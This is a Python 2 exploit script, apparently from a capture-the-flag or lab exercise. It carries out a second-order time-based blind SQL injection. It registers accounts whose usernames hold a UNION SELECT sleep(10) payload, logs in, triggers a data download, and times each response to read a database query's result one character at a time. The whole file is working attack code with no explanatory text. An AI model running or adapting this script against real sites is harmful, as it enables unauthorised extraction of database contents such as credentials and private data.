fullExploit.py

import requests
import sys
import hashlib
import urllib
import os
import random
import string
import time


def randomString(stringLength=8):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))


proxies = {'http':'127.0.0.1:8080', 'http':'127.0.0.1:8080'} 
										
def register(ip,inj_str):							# Getting registered
	for j in range(32, 126):
		
		target = "http://%s//signup.php" % (ip) 
		password = 'password'
		
		username = '%s' % (inj_str.replace("[CHAR]", str(j)))

		data = {
			"username" : username,
			"email" : randomString()+"@tester.com",
			"password" : password,
			"password1" : password,
			"SignUp": "SignUp"
		}
		
		r = requests.post(target, data=data, allow_redirects=True)
		res = r.text
	
	return True	
	
										
def login(ip, inj_str):					# Logging in
	
	for j in range(32, 126):
		target = "http://%s/index.php" % (ip)
		password = 'password'

		username = '%s' % (inj_str.replace("[CHAR]", str(j)))
		
		data = {
			"username" : username,
			"password" : password,
			"login" : password
		}
		s  = requests.Session()
		r = s.post(target, data=data)
		res = r.text
		
		#status_code = r.status_code
		
		if 'Followers' in res:

			# open log files
			target = "http://%s//user/settings.php?download=Download+Data" % (ip)
		
			data = {
				"download" : "Download Data",
			}
			
			response = s.get(target,timeout=20.00)

			time = response.elapsed.total_seconds()

			if(time > 10 ):
				return j
			
			
						
	return False

def inject(r, inj, ip):
	extracted = ""
	for k in range(1, r):

		injection_string = "'/**/union/**/select/**/(case/**/when/**/(ascii(substring((%s),%s,1))=[CHAR])/**/then/**/sleep(10)/**/else/**/null/**/end),2,3,4,5,6,7,8,9/**/#" % (inj, k)
		register(ip,injection_string)
		retrieved_value = login(ip, injection_string)
		if(retrieved_value):
			extracted += chr(retrieved_value)
			extracted_char = chr(retrieved_value)
			sys.stdout.write(extracted_char)
			sys.stdout.flush()
		else:
			print "\n(+) done!"
			break
	return extracted
										


def main(): 
    if len(sys.argv) != 2:
        print "(+) usage: %s  " % sys.argv[0]
        print '(+) eg: %s ' %sys.argv[0]
    	sys.exit(-1)

    ip = "localhost"
    query = sys.argv[1]
    print "(+) Retrieving...."
    #query = "select/**/your_flag/**/from/**/flag"
    query = query.replace(" ", "/**/")
    Flag = inject(40, query, ip)
    print Flag

if __name__ == "__main__":
    main()